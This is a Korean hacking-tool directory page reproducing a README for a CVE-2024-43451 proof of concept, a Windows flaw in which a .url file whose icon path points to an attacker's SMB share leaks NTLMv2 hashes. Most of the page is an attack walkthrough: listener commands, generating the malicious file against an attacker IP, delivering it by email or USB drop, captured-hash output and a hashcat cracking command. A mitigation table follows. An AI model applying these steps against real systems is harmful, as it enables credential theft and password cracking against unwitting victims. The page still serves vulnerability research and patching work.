Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2024-43451-ntlm_hash_disclosure_reproduction — CVE 재현: cve-2024-43451-ntlm_hash_disclosure_reproduction | Kitploit
도구/GitHubGitHub/razureink/cve-2024-43451-ntlm_hash_disclosure_reproduction
Password CrackingPhishing ToolsReconnaissanceVulnerability AnalysisExploitationInformation GatheringLearning & EducationLabs & Practice

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
razureink/cve-2024-43451-ntlm_hash_disclosure_reproduction

cve-2024-43451-ntlm_hash_disclosure_reproduction

CVE 재현: cve-2024-43451-ntlm_hash_disclosure_reproduction

저장소 보기
222개월 전아직 검토되지 않음

CVE-2024-43451 — Windows NTLM 해시 공개 스푸핑 취약점

개요

CVE-2024-43451은 Windows의 NTLMv2 해시 공개 스푸핑 취약점입니다. 인증되지 않은 원격 공격자가 피해자를 악성 .url 바로 가기 파일과 상호작용하도록 유도하여 피해자의 NTLM 해시를 유출할 수 있습니다. 취약점은 최소한의 사용자 상호작용(파일을 마우스 오른쪽 클릭, 삭제 또는 이동하는 것만으로도)으로 트리거됩니다. CVSS 점수는 6.5(중간)이며 실제 환경에서 적극적으로 악용되었습니다. CISA는 이를 알려진 악용 취약점(KEV) 카탈로그에 추가했습니다.

기술 세부 사항

NTLM 인증

NTLM(NT LAN Manager)은 Windows에서 사용하는 challenge-response 인증 프로토콜입니다. 클라이언트가 SMB를 통해 리소스에 액세스하려고 하면 클라이언트와 서버가 다음과 같이 핸드셰이크를 수행합니다:

  1. 클라이언트는 지원되는 기능이 포함된 NEGOTIATE_MESSAGE를 보냅니다.
  2. 서버는 8바이트 난수(서버 challenge)가 포함된 CHALLENGE_MESSAGE로 응답합니다.
  3. 클라이언트는 NTLMv2 해시(사용자 비밀번호 해시, 사용자 이름 및 도메인과 결합된 challenge의 HMAC-MD5)가 포함된 AUTHENTICATE_MESSAGE로 응답합니다.

공격자가 자신이 제어하는 시스템에 대한 NTLM 인증 시도를 관찰하거나 유도할 수 있는 경우, 캡처된 AUTHENTICATE_MESSAGE는 오프라인에서 크랙되어 평문 비밀번호를 복구할 수 있습니다.

.url 파일 형식

.url 파일은 Internet Explorer 및 Windows 탐색기에서 링크를 저장하는 데 사용되는 바로 가기 파일입니다. INI 형식의 파일이며 [InternetShortcut] 섹션이 있습니다. 악용에 중요한 필드는 다음과 같습니다:

  • URL= — Windows가 열 대상 URL입니다.
  • IconFile= — 아이콘 리소스의 선택적 UNC 경로입니다. Windows 탐색기가 파일을 렌더링할 때 원격 공유에서 자동으로 아이콘을 검색하여 공격자 서버에 대한 NTLM 인증을 트리거합니다.

공격 벡터

공격자는 IconFile 매개변수가 \\attacker-ip\share\icon.ico를 가리키는 .url 파일을 만듭니다. 피해자가 다음을 수행하면:

  • 마우스 오른쪽 클릭(Windows 탐색기가 컨텍스트 메뉴에 대한 아이콘을 가져옴),
  • 이동 또는 복사(아이콘이 다시 읽혀짐),
  • 삭제(휴지통 대화 상자를 위해 아이콘이 가져와짐),

Windows 탐색기가 UNC 경로에서 아이콘을 로드하려고 시도하여 피해자의 NTLMv2 해시를 공격자의 SMB 리스너(예: Responder)로 보냅니다.

영향을 받는 버전

2024년 11월 패치 화요일 업데이트 이전의 지원되는 모든 Windows 버전:

  • Windows 10(모든 버전)
  • Windows 11
  • Windows Server 2016 / 2019 / 2022 / 2025
  • Windows Server 2008 / 2012 R2
  • 지원되지 않는 이전 버전도 취약할 가능성이 높지만 패치가 제공되지 않습니다.

악용 설정

요구 사항

  • 공격자 시스템: SMB 캡처 도구(예: Responder, Impacket의 smbserver 또는 Inveigh)가 있는 Linux 또는 Windows.
  • 피해자 시스템: 패치되지 않은 모든 Windows 시스템.
  • 네트워크 액세스: 피해자가 포트 445(SMB)에서 공격자 IP에 도달할 수 있어야 합니다.

도구

도구설명
ResponderLLMNR/NBT-NS/mDNS 포이즈너, 해시 캡처를 위한 내장 SMB 서버 포함
Impacketsmbserver.py를 사용하여 간단한 SMB 공유 호스팅 가능
InveighWindows용 PowerShell 기반 NTLM 캡처 도구

재현 단계

1. SMB 리스너 시작 (공격자 시스템)

Responder 사용:

sudo responder -I eth0 -v

또는 Impacket 사용:

sudo impacket-smbserver share . -smb2support

2. 악성 .url 파일 생성

python exploit.py --ip 192.168.1.100 --output malicious.url

3. 피해자에게 파일 전달

  • 이메일 첨부, USB 드롭, 파일 공유 또는 웹 다운로드.

4. 피해자 상호작용

다음 작업 중 하나라도 해시 유출을 트리거합니다:

  • 마우스 오른쪽 클릭 → 컨텍스트 메뉴에 대한 아이콘 가져오기 → 공격자에게 NTLM 핸드셰이크 전송
  • 삭제 → 확인 대화 상자에 대한 아이콘 가져오기
  • 이동/복사 → UNC 경로에서 아이콘 다시 읽기
  • 세부 정보 또는 아이콘 보기로 폴더 보기(아이콘 로딩)

5. 해시 캡처

공격자의 SMB 리스너가 NTLMv2 해시를 수신합니다:

[SMB] NTLMv2-SSP Hash     : victim::DOMAIN:1122334455667788:0123456789abcdef0123456789abcdef:010100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

6. 해시 크랙 (오프라인)

hashcat -m 5600 captured.txt /usr/share/wordlists/rockyou.txt

개념 증명

# 전체 PoC 구현은 이 저장소의 exploit.py를 참조하십시오.
# 스크립트는 IconFile이 다음과 같이 설정된 .url 파일을 생성합니다:
#   \\192.168.1.100\share\icon.ico
# 선택적으로 IconIndex를 통해 사용자 지정 표시 아이콘을 설정할 수 있습니다.

완화

완화 조치설명
2024년 11월 패치 적용KB5044285에서 Microsoft 보안 업데이트 설치
아웃바운드 SMB 차단 (포트 445)NTLM 해시가 네트워크 경계를 벗어나지 못하도록 방지
가능한 경우 NTLM 비활성화Kerberos 전용 인증 사용
SMB 서명 활성화해시가 캡처되더라도 릴레이 공격 방지
사용자 인식 교육사용자가 예상치 못한 .url 파일과 상호작용하지 않도록 교육
.url 파일 처리 제한그룹 정책을 사용하여 이메일을 통한 .url 파일 실행 또는 전달 차단

참고 자료

  • Microsoft 보안 대응 센터 — CVE-2024-43451
  • CISA 알려진 악용 취약점 카탈로그
  • NVD — CVE-2024-43451
  • Responder — GitHub
  • Impacket — GitHub
  • The Hacker News — 우크라이나 표적 공격
  • UAC-0194 / SparkRAT 캠페인 분석
도구 다운로드